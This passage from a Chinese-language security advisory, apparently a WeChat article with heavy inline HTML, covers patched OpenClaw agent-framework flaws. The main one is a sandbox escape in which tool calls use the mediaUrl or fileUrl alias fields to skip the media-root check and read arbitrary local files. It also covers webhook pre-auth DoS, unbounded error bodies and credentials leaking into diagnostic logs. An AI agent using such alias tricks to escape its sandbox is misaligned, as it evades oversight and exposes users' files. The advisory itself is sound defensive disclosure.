0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 17.28px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">fileUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 别名绕过</span></h3><p data-line="175" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：高危  </span></p><p data-line="175" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">影响版本</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：version &lt;= </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.23</span></code></p><p data-line="178" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">攻击场景</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：OpenClaw 对出站工具和消息动作中的媒体访问路径设有媒体根目录（media-root）限制，以防止代理访问沙箱外的本地文件。旧版本在校验路径时仅检查 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">url</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 字段，而出站动作同时支持 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">mediaUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 和 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">fileUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 作为别名字段。攻击者通过在出站工具调用或消息动作中使用 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">mediaUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">/</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">fileUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 字段替代 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">url</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 字段，可绕过媒体根目录限制，访问沙箱外的任意本地文件路径，实现沙箱逃逸。</span></p><p data-line="180" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">技术根因</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/media/dispatch.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）</span></p><p data-line="182" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">漏洞前态：路径校验仅覆盖 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">url</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 字段，</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">mediaUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 和 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">fileUrl</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 别名字段未经媒体根目录检查即被直接使用，攻击者可通过别名字段绕过限制。</span></p><p data-line="184" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复后（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）：先将三个字段按优先级合并为最终路径，再统一执行媒体根目录校验，消除别名绕过路径。</span></p><p data-line="186" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">修复效果</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：出站工具和消息动作中的所有媒体路径别名均受媒体根目录限制约束，</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">workspaceOnly</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 模式下的沙箱代理无法通过别名字段访问沙箱外文件。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h3 data-line="190" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">4.7 其他修复摘要</span></h3><p data-line="192" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Webhook 前置鉴权缺失（高危）</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：</span><span data-pm-slice="0 0 []" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Webhook 入口在旧版本中先读取并解析请求体，再校验签名，导致未鉴权请求也能触发 body 解析，形成 pre-auth 慢请求 DoS 面。修复后，所有 Webhook 入口将签名校验前置，鉴权失败立即断开连接（</span></span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Connection: close</span></code><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）。</span></span></p><p data-line="194" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">远程媒体错误体泄露（高危）</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：旧版本在媒体下载失败时使用 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">res.text()</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"> 整体读取错误响应体，攻击者可通过构造异常大的错误体或 slow body 造成内存放大，同时错误体中的敏感内容（如内部路径、凭据片段）更容易进入日志。修复后，错误体读取被限制在 8KB 上限和超时约束内。</span></p><p data-line="196" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);text-align: left;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">Diagnostics 缓存追踪凭据泄露（中危）</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">：旧版本在生成诊断缓存追踪 JSONL 文件时，未对输出字段进行过滤，凭据相关字段（如 API key 片段、token 值）可能随诊断日志落盘，在日志被共享或上传时造成凭据泄露。修复后（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">2026.3.23</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">），JSONL 输出在写入前会剥离所有凭据字段，仅保留非敏感诊断字段与图像编辑元数据（</span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 15.3px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">src/infra/diagnostics/cache-trace.ts</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">）。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="200" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2.5em auto 1.5em;padding: 0.3em 1.2em;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;width: fit-content;color: rgb(255, 255, 255);background: rgb(0, 82, 217);border-radius: 6px;box-shadow: none;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">05 版本发布时间线与升级路径</span></h2><h3 data-line="202" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">发布时间线</span></h3><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;text-align: center;"><img alt="图片" class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="508711170" data-ratio="0.17592592592592593" data-s="300,640" data-type="png" data-w="1080" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;vertical-align: bottom;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible !important;width: 676.953px !important;height: auto !important;" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=fe6e724d&amp;u=https%3A%2F%2Fmmecoa.qpic.cn%2Fsz_mmecoa_png%2F4EHqib0vXQFibkqBk4v8PX82vTtUYPLl6zlHZjdLopGyIdemCZlrdlusibffQD9JlQialDEVfvUuPib4U7o39C3eLQsaOLAj5yTqwUJyRv8hM1Ls%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D10005%26wx_lazy%3D1%23imgIndex%3D3"/></p><h3 data-line="211" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 51);line-height: 1.2;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">版本关系说明</span></h3><ul style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px 0px 0px 1.5em;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;list-style-type: disc;color: rgb(51, 51, 51);" class="list-paddingleft-1"><li style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: list-item;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);"><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 